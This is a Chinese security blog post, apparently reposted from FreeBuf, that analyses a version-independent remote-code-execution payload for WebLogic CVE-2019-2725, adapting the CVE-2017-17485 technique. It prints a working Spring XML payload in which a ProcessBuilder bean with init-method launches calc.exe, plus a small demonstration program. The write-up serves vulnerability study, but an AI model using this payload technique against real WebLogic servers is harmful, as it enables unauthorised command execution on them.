0x01 概述
首先廖大神在自己的博客里提到了通过
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext,可以构造无视jdk版本限制的payload,本着学习的心态搞一搞,看看为啥会这样。
![图片[1]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/o1ik9.png)
0x02 深入
从这篇文章中看到,构造方法可以参考这个CVE-2017-17485。
![图片[2]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/0hx99.png)
先看看这个漏洞的payload。
![图片[3]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/3ehj4.png)
再看看如何利用这个漏洞,我们发现这个漏洞利用方式是通过org.springframework.context.support.FileSystemXmlApplicationContext这个方法去加载恶意xml文件,而在上面的xml文件中通过spel表达式可以触发相关payload。
![图片[4]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/8jehn.png)
回到本次 weblogic 上, weblogic 也有这个相关构造函数,所以我们可以使用这个payload先试试,测试过程中发现无法使用,深究一下看一下代码,我们发现 weblogic 解析 xml 文件的类com.bea.core.repackaged.springframework.beans.factory.support.BeanDefinitionValueResolver
![图片[5]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/y9wuo.png)
我在这里打一个断点,这样进入
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext之后的操作就很明显。
![图片[6]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/niw73.png)
这个地方和 CVE-2017-17485 的payload触发位置相比,少了一个表达式解析方法
Object valueObject=evaluate(TypedStringValue)
也就是说这里xml没办法通过类似对 #{ pb.start() } 开始针对 pb 这个 bean 进行操作。所以说这里需要调整理一下 payload ,我调整后的结果如下所示。
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd "> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg value="calc.exe" /> </bean> </beans>
关于在spring 容器初始化 bean 和销毁前所做的操作定义方式有三种:第一种:通过@PostConstruct 和 @PreDestroy 方法 实现初始化和销毁bean之前进行的操作
第二种是:通过在xml中定义init-method 和 destory-method方法
第三种是: 通过bean实现InitializingBean和 DisposableBean接口
CVE-2017-17485 这个漏洞的触发 payload 用的是 spel 表达式的方法注册 bean ,而我们这里由于缺少相关解析文件无法使用 spel 表达式,这里可以使用 init-method 方法来解决这里这个问题,可以先看一个例子
测试程序如下:
public class TestInitMethod{
public void testInit(){
System.out.println("test init-method");
}
}
配置文件如下:
//spring.xml <bean id="testInitMethod" class="com.TestInitMethod" init-method="testInit"></bean>
Main主程序如下:
public class Main {
public static void main(String[] args){
ClassPathXmlApplicationContext context1 = new ClassPathXmlApplicationContext("spring.xml");
}
}
打印如下结果:
test init-method
这里为什么没办法支持 spel ,我的想法可能是因为spring版本过低,所以没办法支持spel表达式。当然FileSystemXmlApplicationContext是继承AbstractXmlApplicationContext![图片[7]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/k4euq.png)
而ClassPathXmlApplicationContext也是继承AbstractXmlApplicationContext。![图片[8]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/6tb2c.png)
所以理论上这个类也可以,试试看,OK确实也可以。![图片[9]-Weblogic-CVE-2019-2725-通杀payload – 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/l1nk3r.xmutsec.com/blog/q4k4j.png)
0x03 后话
由于最近工作繁忙,导致学习时间极度拉下来,这个方法已经能够命令执行了,就不继续构造下一步payload,大家可以试试。这个方法也有缺陷,如果服务器无法主动发起请求的情况,也是没办法达到效果的,这个weblogic还是有很多地方可以学习的。
0x04 Reference
Spring配置文件中指定init-method属性的作用CVE-2019-2725 分析WebLogic RCE(CVE-2019-2725)漏洞之旅
来源:freebuf.com 2019-05-16 23:31:17 by: Setup
请登录后发表评论
注册